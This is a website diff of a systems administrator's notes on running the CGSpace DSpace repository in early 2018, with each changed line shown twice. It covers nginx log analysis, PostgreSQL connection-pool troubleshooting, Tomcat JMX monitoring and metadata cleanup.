<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz /var/log/nginx/library-access.log.2.gz /var/log/nginx/library-access.log.3.gz /var/log/nginx/rest.log.2.gz /var/log/nginx/rest.log.3.gz /var/log/nginx/oai.log.2.gz /var/log/nginx/oai.log.3.gz /var/log/nginx/error.log.2.gz /var/log/nginx/error.log.3.gz | grep &#34;21/Jan/2018&#34; | grep &#34;GET &#34; | grep -v &#34;/admin&#34; | awk &#39;{print $7}&#39; | grep -Eo &#39;^/($|open-search|discover)&#39; | sort | uniq -c
1050 /
413 /discover
170 /open-search
</code></pre><ul>
<li>The last 10% or so seem to be for static assets that would be served by nginx anyways:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz /var/log/nginx/library-access.log.2.gz /var/log/nginx/library-access.log.3.gz /var/log/nginx/rest.log.2.gz /var/log/nginx/rest.log.3.gz /var/log/nginx/oai.log.2.gz /var/log/nginx/oai.log.3.gz /var/log/nginx/error.log.2.gz /var/log/nginx/error.log.3.gz | grep &quot;21/Jan/2018&quot; | grep &quot;GET &quot; | grep -v &quot;/admin&quot; | awk '{print $7}' | grep -v bitstream | grep -Eo '\.(js|css|png|jpg|jpeg|php|svg|gif|txt|map)$' | sort | uniq -c | sort -n
<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz /var/log/nginx/library-access.log.2.gz /var/log/nginx/library-access.log.3.gz /var/log/nginx/rest.log.2.gz /var/log/nginx/rest.log.3.gz /var/log/nginx/oai.log.2.gz /var/log/nginx/oai.log.3.gz /var/log/nginx/error.log.2.gz /var/log/nginx/error.log.3.gz | grep &#34;21/Jan/2018&#34; | grep &#34;GET &#34; | grep -v &#34;/admin&#34; | awk &#39;{print $7}&#39; | grep -v bitstream | grep -Eo &#39;\.(js|css|png|jpg|jpeg|php|svg|gif|txt|map)$&#39; | sort | uniq -c | sort -n
2 .gif
7 .css
84 .js
@ -1153,7 +1153,7 @@ $ ./rest-find-collections.py 10568/1 | grep -i untitled
<ul>
<li>Looking at the REST requests, most of them are to expand all or metadata, but 5% are for retrieving bitstreams:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log.3.gz /var/log/nginx/access.log.4.gz /var/log/nginx/library-access.log.3.gz /var/log/nginx/library-access.log.4.gz /var/log/nginx/rest.log.3.gz /var/log/nginx/rest.log.4.gz /var/log/nginx/oai.log.3.gz /var/log/nginx/oai.log.4.gz /var/log/nginx/error.log.3.gz /var/log/nginx/error.log.4.gz | grep &quot;21/Jan/2018&quot; | grep &quot;GET &quot; | grep -v &quot;/admin&quot; | awk '{print $7}' | grep -E &quot;^/rest&quot; | grep -Eo &quot;(retrieve|expand=[a-z].*)&quot; | sort | uniq -c | sort -n
<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log.3.gz /var/log/nginx/access.log.4.gz /var/log/nginx/library-access.log.3.gz /var/log/nginx/library-access.log.4.gz /var/log/nginx/rest.log.3.gz /var/log/nginx/rest.log.4.gz /var/log/nginx/oai.log.3.gz /var/log/nginx/oai.log.4.gz /var/log/nginx/error.log.3.gz /var/log/nginx/error.log.4.gz | grep &#34;21/Jan/2018&#34; | grep &#34;GET &#34; | grep -v &#34;/admin&#34; | awk &#39;{print $7}&#39; | grep -E &#34;^/rest&#34; | grep -Eo &#34;(retrieve|expand=[a-z].*)&#34; | sort | uniq -c | sort -n
1 expand=collections
16 expand=all&amp;limit=1
45 expand=items
@ -1268,15 +1268,15 @@ $ ./jmeter -n -t ~/dspace-performance-test/DSpacePerfTest-dspacetest.cgiar.org.j
<li>Looking at the DSpace logs I see this error happened just before UptimeRobot noticed it going down:</li>
</ul>
<pre tabindex="0"><code>2018-01-29 05:30:22,226 INFO org.dspace.usage.LoggerUsageEventListener @ anonymous:session_id=3775D4125D28EF0C691B08345D905141:ip_addr=68.180.229.254:view_item:handle=10568/71890
2018-01-29 05:30:22,322 ERROR org.dspace.app.xmlui.aspect.discovery.AbstractSearch @ org.apache.solr.search.SyntaxError: Cannot parse 'dateIssued_keyword:[1994+TO+1999]': Encountered &quot; &quot;]&quot; &quot;] &quot;&quot; at line 1, column 32.
2018-01-29 05:30:22,322 ERROR org.dspace.app.xmlui.aspect.discovery.AbstractSearch @ org.apache.solr.search.SyntaxError: Cannot parse &#39;dateIssued_keyword:[1994+TO+1999]&#39;: Encountered &#34; &#34;]&#34; &#34;] &#34;&#34; at line 1, column 32.
Was expecting one of:
&quot;TO&quot; ...
&#34;TO&#34; ...
&lt;RANGE_QUOTED&gt; ...
&lt;RANGE_GOOP&gt; ...
org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse 'dateIssued_keyword:[1994+TO+1999]': Encountered &quot; &quot;]&quot; &quot;] &quot;&quot; at line 1, column 32.
org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse &#39;dateIssued_keyword:[1994+TO+1999]&#39;: Encountered &#34; &#34;]&#34; &#34;] &#34;&#34; at line 1, column 32.
Was expecting one of:
&quot;TO&quot; ...
&#34;TO&#34; ...
&lt;RANGE_QUOTED&gt; ...
&lt;RANGE_GOOP&gt; ...
</code></pre><ul>
@ -1284,12 +1284,12 @@ Was expecting one of:
<li>I see a few dozen HTTP 499 errors in the nginx access log for a few minutes before this happened, but HTTP 499 is just when nginx says that the client closed the request early</li>
<li>Perhaps this from the nginx error log is relevant?</li>
</ul>
<pre tabindex="0"><code>2018/01/29 05:26:34 [warn] 26895#26895: *944759 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/16/0000026166 while reading upstream, client: 180.76.15.34, server: cgspace.cgiar.org, request: &quot;GET /bitstream/handle/10947/4658/FISH%20Leaflet.pdf?sequence=12 HTTP/1.1&quot;, upstream: &quot;http://127.0.0.1:8443/bitstream/handle/10947/4658/FISH%20Leaflet.pdf?sequence=12&quot;, host: &quot;cgspace.cgiar.org&quot;
<pre tabindex="0"><code>2018/01/29 05:26:34 [warn] 26895#26895: *944759 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/16/0000026166 while reading upstream, client: 180.76.15.34, server: cgspace.cgiar.org, request: &#34;GET /bitstream/handle/10947/4658/FISH%20Leaflet.pdf?sequence=12 HTTP/1.1&#34;, upstream: &#34;http://127.0.0.1:8443/bitstream/handle/10947/4658/FISH%20Leaflet.pdf?sequence=12&#34;, host: &#34;cgspace.cgiar.org&#34;
</code></pre><ul>
<li>I think that must be unrelated, probably the client closed the request to nginx because DSpace (Tomcat) was taking too long</li>
<li>An interesting <a href="https://gist.github.com/magnetikonline/11312172">snippet to get the maximum and average nginx responses</a>:</li>
</ul>
<pre tabindex="0"><code># awk '($9 ~ /200/) { i++;sum+=$10;max=$10&gt;max?$10:max; } END { printf(&quot;Maximum: %d\nAverage: %d\n&quot;,max,i?sum/i:0); }' /var/log/nginx/access.log
<pre tabindex="0"><code># awk &#39;($9 ~ /200/) { i++;sum+=$10;max=$10&gt;max?$10:max; } END { printf(&#34;Maximum: %d\nAverage: %d\n&#34;,max,i?sum/i:0); }&#39; /var/log/nginx/access.log
Maximum: 2771268
Average: 210483
</code></pre><ul>
@ -1297,7 +1297,7 @@ Average: 210483
<li>My best guess is that the Solr search error is related somehow but I can&rsquo;t figure it out</li>
<li>We definitely have enough database connections, as I haven&rsquo;t seen a pool error in weeks:</li>
</ul>
<pre tabindex="0"><code>$ grep -c &quot;Timeout: Pool empty.&quot; dspace.log.2018-01-2*
<pre tabindex="0"><code>$ grep -c &#34;Timeout: Pool empty.&#34; dspace.log.2018-01-2*
dspace.log.2018-01-20:0
dspace.log.2018-01-21:0
dspace.log.2018-01-22:0
@ -1329,7 +1329,7 @@ dspace.log.2018-01-29:0
<pre tabindex="0"><code>[tomcat_*]
env.host 127.0.0.1
env.port 8081
env.connector &quot;http-bio-127.0.0.1-8443&quot;
env.connector &#34;http-bio-127.0.0.1-8443&#34;
env.user munin
env.password munin
</code></pre><ul>
@ -1345,8 +1345,8 @@ max.value 400
<li>Although following the logic of <em>/usr/share/munin/plugins/jmx_tomcat_dbpools</em> could be useful for getting the active Tomcat sessions</li>
<li>From debugging the <code>jmx_tomcat_db_pools</code> script from the <code>munin-plugins-java</code> package, I see that this is how you call arbitrary mbeans:</li>
</ul>
<pre tabindex="0"><code># port=5400 ip=&quot;127.0.0.1&quot; /usr/bin/java -cp /usr/share/munin/munin-jmx-plugins.jar org.munin.plugin.jmx.Beans Catalina:type=DataSource,class=javax.sql.DataSource,name=* maxActive
Catalina:type=DataSource,class=javax.sql.DataSource,name=&quot;jdbc/dspace&quot; maxActive 300
<pre tabindex="0"><code># port=5400 ip=&#34;127.0.0.1&#34; /usr/bin/java -cp /usr/share/munin/munin-jmx-plugins.jar org.munin.plugin.jmx.Beans Catalina:type=DataSource,class=javax.sql.DataSource,name=* maxActive
Catalina:type=DataSource,class=javax.sql.DataSource,name=&#34;jdbc/dspace&#34; maxActive 300
</code></pre><ul>
<li>More notes here: <a href="https://github.com/munin-monitoring/contrib/tree/master/plugins/jmx">https://github.com/munin-monitoring/contrib/tree/master/plugins/jmx</a></li>
<li>Looking at the Munin graphs, I that the load is 200% every morning from 03:00 to almost 08:00</li>
@ -1356,7 +1356,7 @@ Catalina:type=DataSource,class=javax.sql.DataSource,name=&quot;jdbc/dspace&quot;
</code></pre><ul>
<li>There are millions of these status lines, for example in just this one log file:</li>
</ul>
<pre tabindex="0"><code># zgrep -c &quot;time remaining&quot; /var/log/tomcat7/catalina.out.1.gz
<pre tabindex="0"><code># zgrep -c &#34;time remaining&#34; /var/log/tomcat7/catalina.out.1.gz
1084741
</code></pre><ul>
<li>I filed a ticket with Atmire: <a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=566">https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=566</a></li>
@ -1389,7 +1389,7 @@ javax.ws.rs.WebApplicationException
<li>For now I will restart Tomcat to clear this shit and bring the site back up</li>
<li>The top IPs from this morning, during 7 and 8AM in XMLUI and REST/OAI:</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 /var/log/nginx/error.log /var/log/nginx/error.log.1 | grep -E &quot;31/Jan/2018:(07|08)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 /var/log/nginx/error.log /var/log/nginx/error.log.1 | grep -E &#34;31/Jan/2018:(07|08)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
67 66.249.66.70
70 207.46.13.12
71 197.210.168.174
@ -1400,7 +1400,7 @@ javax.ws.rs.WebApplicationException
198 66.249.66.90
219 41.204.190.40
255 2405:204:a208:1e12:132:2a8e:ad28:46c0
# cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &quot;31/Jan/2018:(07|08)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
# cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &#34;31/Jan/2018:(07|08)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
2 65.55.210.187
2 66.249.66.90
3 157.55.39.79
@ -1426,7 +1426,7 @@ javax.ws.rs.WebApplicationException
<li>I should make separate database pools for the web applications and the API applications like REST and OAI</li>
<li>Ok, so this is interesting: I figured out how to get the MBean path to query Tomcat&rsquo;s activeSessions from JMX (using <code>munin-plugins-java</code>):</li>
</ul>
<pre tabindex="0"><code># port=5400 ip=&quot;127.0.0.1&quot; /usr/bin/java -cp /usr/share/munin/munin-jmx-plugins.jar org.munin.plugin.jmx.Beans Catalina:type=Manager,context=/,host=localhost activeSessions
<pre tabindex="0"><code># port=5400 ip=&#34;127.0.0.1&#34; /usr/bin/java -cp /usr/share/munin/munin-jmx-plugins.jar org.munin.plugin.jmx.Beans Catalina:type=Manager,context=/,host=localhost activeSessions
Catalina:type=Manager,context=/,host=localhost activeSessions 8
</code></pre><ul>
<li>If you connect to Tomcat in <code>jvisualvm</code> it&rsquo;s pretty obvious when you hover over the elements</li>

View File

@ -30,7 +30,7 @@ We don&rsquo;t need to distinguish between internal and external works, so that
Yesterday I figured out how to monitor DSpace sessions using JMX
I copied the logic in the jmx_tomcat_dbpools provided by Ubuntu&rsquo;s munin-plugins-java package and used the stuff I discovered about JMX in 2018-01
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -139,8 +139,8 @@ v_oai.value 0
<li>I finally took a look at the second round of cleanups Peter had sent me for author affiliations in mid January</li>
<li>After trimming whitespace and quickly scanning for encoding errors I applied them on CGSpace:</li>
</ul>
<pre tabindex="0"><code>$ ./delete-metadata-values.py -i /tmp/2018-02-03-Affiliations-12-deletions.csv -f cg.contributor.affiliation -m 211 -d dspace -u dspace -p 'fuuu'
$ ./fix-metadata-values.py -i /tmp/2018-02-03-Affiliations-1116-corrections.csv -f cg.contributor.affiliation -t correct -m 211 -d dspace -u dspace -p 'fuuu'
<pre tabindex="0"><code>$ ./delete-metadata-values.py -i /tmp/2018-02-03-Affiliations-12-deletions.csv -f cg.contributor.affiliation -m 211 -d dspace -u dspace -p &#39;fuuu&#39;
$ ./fix-metadata-values.py -i /tmp/2018-02-03-Affiliations-1116-corrections.csv -f cg.contributor.affiliation -t correct -m 211 -d dspace -u dspace -p &#39;fuuu&#39;
</code></pre><ul>
<li>Then I started a full Discovery reindex:</li>
</ul>
@ -152,12 +152,12 @@ sys 2m29.088s
</code></pre><ul>
<li>Generate a new list of affiliations for Peter to sort through:</li>
</ul>
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'affiliation') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/affiliations.csv with csv;
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;affiliation&#39;) AND resource_type_id = 2 group by text_value order by count desc) to /tmp/affiliations.csv with csv;
COPY 3723
</code></pre><ul>
<li>Oh, and it looks like we processed over 3.1 million requests in January, up from 2.9 million in <a href="/cgspace-notes/2017-12/">December</a>:</li>
</ul>
<pre tabindex="0"><code># time zcat --force /var/log/nginx/* | grep -cE &quot;[0-9]{1,2}/Jan/2018&quot;
<pre tabindex="0"><code># time zcat --force /var/log/nginx/* | grep -cE &#34;[0-9]{1,2}/Jan/2018&#34;
3126109
real 0m23.839s
@ -167,14 +167,14 @@ sys 0m1.905s
<ul>
<li>Toying with correcting authors with trailing spaces via PostgreSQL:</li>
</ul>
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value=REGEXP_REPLACE(text_value, '\s+$' , '') where resource_type_id=2 and metadata_field_id=3 and text_value ~ '^.*?\s+$';
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value=REGEXP_REPLACE(text_value, &#39;\s+$&#39; , &#39;&#39;) where resource_type_id=2 and metadata_field_id=3 and text_value ~ &#39;^.*?\s+$&#39;;
UPDATE 20
</code></pre><ul>
<li>I tried the <code>TRIM(TRAILING from text_value)</code> function and it said it changed 20 items but the spaces didn&rsquo;t go away</li>
<li>This is on a fresh import of the CGSpace database, but when I tried to apply it on CGSpace there were no changes detected. Weird.</li>
<li>Anyways, Peter wants a new list of authors to clean up, so I exported another CSV:</li>
</ul>
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors-2018-02-05.csv with csv;
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;) AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors-2018-02-05.csv with csv;
COPY 55630
</code></pre><h2 id="2018-02-06">2018-02-06</h2>
<ul>
@ -184,7 +184,7 @@ COPY 55630
</ul>
<pre tabindex="0"><code># date
Tue Feb 6 09:30:32 UTC 2018
# cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &quot;6/Feb/2018:(08|09)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
# cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &#34;6/Feb/2018:(08|09)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
2 223.185.41.40
2 66.249.64.14
2 77.246.52.40
@ -195,7 +195,7 @@ Tue Feb 6 09:30:32 UTC 2018
6 154.68.16.34
7 207.46.13.66
1548 50.116.102.77
# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 /var/log/nginx/error.log /var/log/nginx/error.log.1 | grep -E &quot;6/Feb/2018:(08|09)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 /var/log/nginx/error.log /var/log/nginx/error.log.1 | grep -E &#34;6/Feb/2018:(08|09)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
77 213.55.99.121
86 66.249.64.14
101 104.196.152.243
@ -232,8 +232,8 @@ Tue Feb 6 09:30:32 UTC 2018
<li>CGSpace crashed again, this time around <code>Wed Feb 7 11:20:28 UTC 2018</code></li>
<li>I took a few snapshots of the PostgreSQL activity at the time and as the minutes went on and the connections were very high at first but reduced on their own:</li>
</ul>
<pre tabindex="0"><code>$ psql -c 'select * from pg_stat_activity' &gt; /tmp/pg_stat_activity.txt
$ grep -c 'PostgreSQL JDBC' /tmp/pg_stat_activity*
<pre tabindex="0"><code>$ psql -c &#39;select * from pg_stat_activity&#39; &gt; /tmp/pg_stat_activity.txt
$ grep -c &#39;PostgreSQL JDBC&#39; /tmp/pg_stat_activity*
/tmp/pg_stat_activity1.txt:300
/tmp/pg_stat_activity2.txt:272
/tmp/pg_stat_activity3.txt:168
@ -242,7 +242,7 @@ $ grep -c 'PostgreSQL JDBC' /tmp/pg_stat_activity*
</code></pre><ul>
<li>Interestingly, all of those 751 connections were idle!</li>
</ul>
<pre tabindex="0"><code>$ grep &quot;PostgreSQL JDBC&quot; /tmp/pg_stat_activity* | grep -c idle
<pre tabindex="0"><code>$ grep &#34;PostgreSQL JDBC&#34; /tmp/pg_stat_activity* | grep -c idle
751
</code></pre><ul>
<li>Since I was restarting Tomcat anyways, I decided to deploy the changes to create two different pools for web and API apps</li>
@ -252,7 +252,7 @@ $ grep -c 'PostgreSQL JDBC' /tmp/pg_stat_activity*
<ul>
<li>Indeed it seems like there were over 1800 sessions today around the hours of 10 and 11 AM:</li>
</ul>
<pre tabindex="0"><code>$ grep -E '^2018-02-07 (10|11)' dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
<pre tabindex="0"><code>$ grep -E &#39;^2018-02-07 (10|11)&#39; dspace.log.2018-02-07 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
1828
</code></pre><ul>
<li>CGSpace went down again a few hours later, and now the connections to the dspaceWeb pool are maxed at 250 (the new limit I imposed with the new separate pool scheme)</li>
@ -262,11 +262,11 @@ $ grep -c 'PostgreSQL JDBC' /tmp/pg_stat_activity*
</code></pre><ul>
<li>&hellip; but in PostgreSQL I see them <code>idle</code> or <code>idle in transaction</code>:</li>
</ul>
<pre tabindex="0"><code>$ psql -c 'select * from pg_stat_activity' | grep -c dspaceWeb
<pre tabindex="0"><code>$ psql -c &#39;select * from pg_stat_activity&#39; | grep -c dspaceWeb
250
$ psql -c 'select * from pg_stat_activity' | grep dspaceWeb | grep -c idle
$ psql -c &#39;select * from pg_stat_activity&#39; | grep dspaceWeb | grep -c idle
250
$ psql -c 'select * from pg_stat_activity' | grep dspaceWeb | grep -c &quot;idle in transaction&quot;
$ psql -c &#39;select * from pg_stat_activity&#39; | grep dspaceWeb | grep -c &#34;idle in transaction&#34;
187
</code></pre><ul>
<li>What the fuck, does DSpace think all connections are busy?</li>
@ -275,12 +275,12 @@ $ psql -c 'select * from pg_stat_activity' | grep dspaceWeb | grep -c &quot;idle
<li>Also, WTF, there was a heap space error randomly in catalina.out:</li>
</ul>
<pre tabindex="0"><code>Wed Feb 07 15:01:54 UTC 2018 | Query:containerItem:91917 AND type:2
Exception in thread &quot;http-bio-127.0.0.1-8081-exec-58&quot; java.lang.OutOfMemoryError: Java heap space
Exception in thread &#34;http-bio-127.0.0.1-8081-exec-58&#34; java.lang.OutOfMemoryError: Java heap space
</code></pre><ul>
<li>I&rsquo;m trying to find a way to determine what was using all those Tomcat sessions, but parsing the DSpace log is hard because some IPs are IPv6, which contain colons!</li>
<li>Looking at the first crash this morning around 11, I see these IPv4 addresses making requests around 10 and 11AM:</li>
</ul>
<pre tabindex="0"><code>$ grep -E '^2018-02-07 (10|11)' dspace.log.2018-02-07 | grep -o -E 'ip_addr=[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | sort -n | uniq -c | sort -n | tail -n 20
<pre tabindex="0"><code>$ grep -E &#39;^2018-02-07 (10|11)&#39; dspace.log.2018-02-07 | grep -o -E &#39;ip_addr=[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}&#39; | sort -n | uniq -c | sort -n | tail -n 20
34 ip_addr=46.229.168.67
34 ip_addr=46.229.168.73
37 ip_addr=46.229.168.76
@ -304,27 +304,26 @@ Exception in thread &quot;http-bio-127.0.0.1-8081-exec-58&quot; java.lang.OutOfM
</code></pre><ul>
<li>These IPs made thousands of sessions today:</li>
</ul>
<pre tabindex="0"><code>$ grep 104.196.152.243 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
<pre tabindex="0"><code>$ grep 104.196.152.243 dspace.log.2018-02-07 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
530
$ grep 207.46.13.71 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
$ grep 207.46.13.71 dspace.log.2018-02-07 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
859
$ grep 40.77.167.62 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
$ grep 40.77.167.62 dspace.log.2018-02-07 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
610
$ grep 54.83.138.123 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
$ grep 54.83.138.123 dspace.log.2018-02-07 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
8
$ grep 207.46.13.135 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
$ grep 207.46.13.135 dspace.log.2018-02-07 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
826
$ grep 68.180.228.157 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
$ grep 68.180.228.157 dspace.log.2018-02-07 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
727
$ grep 40.77.167.36 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
$ grep 40.77.167.36 dspace.log.2018-02-07 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
181
$ grep 130.82.1.40 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
$ grep 130.82.1.40 dspace.log.2018-02-07 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
24
$ grep 207.46.13.54 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
$ grep 207.46.13.54 dspace.log.2018-02-07 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
166
$ grep 46.229.168 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
$ grep 46.229.168 dspace.log.2018-02-07 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
992
</code></pre><ul>
<li>Let&rsquo;s investigate who these IPs belong to:
<ul>
@ -355,13 +354,13 @@ $ grep 46.229.168 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' |
<li>Helix84 recommends restarting PostgreSQL instead of Tomcat because it restarts quicker</li>
<li>This is how the connections looked when it crashed this afternoon:</li>
</ul>
<pre tabindex="0"><code>$ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
<pre tabindex="0"><code>$ psql -c &#39;select * from pg_stat_activity&#39; | grep -o -E &#39;(dspaceWeb|dspaceApi|dspaceCli)&#39; | sort | uniq -c
5 dspaceApi
290 dspaceWeb
</code></pre><ul>
<li>This is how it is right now:</li>
</ul>
<pre tabindex="0"><code>$ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
<pre tabindex="0"><code>$ psql -c &#39;select * from pg_stat_activity&#39; | grep -o -E &#39;(dspaceWeb|dspaceApi|dspaceCli)&#39; | sort | uniq -c
5 dspaceApi
5 dspaceWeb
</code></pre><ul>
@ -378,7 +377,7 @@ $ grep 46.229.168 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' |
<li>Switch authority.controlled off and change authorLookup to lookup, and the ORCID badge doesn&rsquo;t show up on the item</li>
<li>Leave all settings but change choices.presentation to lookup and ORCID badge is there and item submission uses LC Name Authority and it breaks with this error:</li>
</ul>
<pre tabindex="0"><code>Field dc_contributor_author has choice presentation of type &quot;select&quot;, it may NOT be authority-controlled.
<pre tabindex="0"><code>Field dc_contributor_author has choice presentation of type &#34;select&#34;, it may NOT be authority-controlled.
</code></pre><ul>
<li>If I change choices.presentation to suggest it give this error:</li>
</ul>
@ -409,18 +408,18 @@ authors-2018-02-05.csv: line 100, char 18, byte 4179: After a first byte between
<li>I updated my <code>fix-metadata-values.py</code> and <code>delete-metadata-values.py</code> scripts on the scripts page: <a href="https://github.com/ilri/DSpace/wiki/Scripts">https://github.com/ilri/DSpace/wiki/Scripts</a></li>
<li>I ran the 342 author corrections (after trimming whitespace and excluding those with <code>||</code> and other syntax errors) on CGSpace:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i Correct-342-Authors-2018-02-11.csv -f dc.contributor.author -t correct -m 3 -d dspace -u dspace -p 'fuuu'
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i Correct-342-Authors-2018-02-11.csv -f dc.contributor.author -t correct -m 3 -d dspace -u dspace -p &#39;fuuu&#39;
</code></pre><ul>
<li>Then I ran a full Discovery re-indexing:</li>
</ul>
<pre tabindex="0"><code>$ export JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx1024m&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx1024m&#34;
$ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
</code></pre><ul>
<li>That reminds me that Bizu had asked me to fix some of Alan Duncan&rsquo;s names in December</li>
<li>I see he actually has some variations with &ldquo;Duncan, Alan J.&quot;: <a href="https://cgspace.cgiar.org/discover?filtertype_1=author&amp;filter_relational_operator_1=contains&amp;filter_1=Duncan%2C+Alan&amp;submit_apply_filter=&amp;query=">https://cgspace.cgiar.org/discover?filtertype_1=author&amp;filter_relational_operator_1=contains&amp;filter_1=Duncan%2C+Alan&amp;submit_apply_filter=&amp;query=</a></li>
<li>I see he actually has some variations with &ldquo;Duncan, Alan J.&rdquo;: <a href="https://cgspace.cgiar.org/discover?filtertype_1=author&amp;filter_relational_operator_1=contains&amp;filter_1=Duncan%2C+Alan&amp;submit_apply_filter=&amp;query=">https://cgspace.cgiar.org/discover?filtertype_1=author&amp;filter_relational_operator_1=contains&amp;filter_1=Duncan%2C+Alan&amp;submit_apply_filter=&amp;query=</a></li>
<li>I will just update those for her too and then restart the indexing:</li>
</ul>
<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like '%Duncan, Alan%';
<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;%Duncan, Alan%&#39;;
text_value | authority | confidence
-----------------+--------------------------------------+------------
Duncan, Alan J. | 5ff35043-942e-4d0a-b377-4daed6e3c1a3 | 600
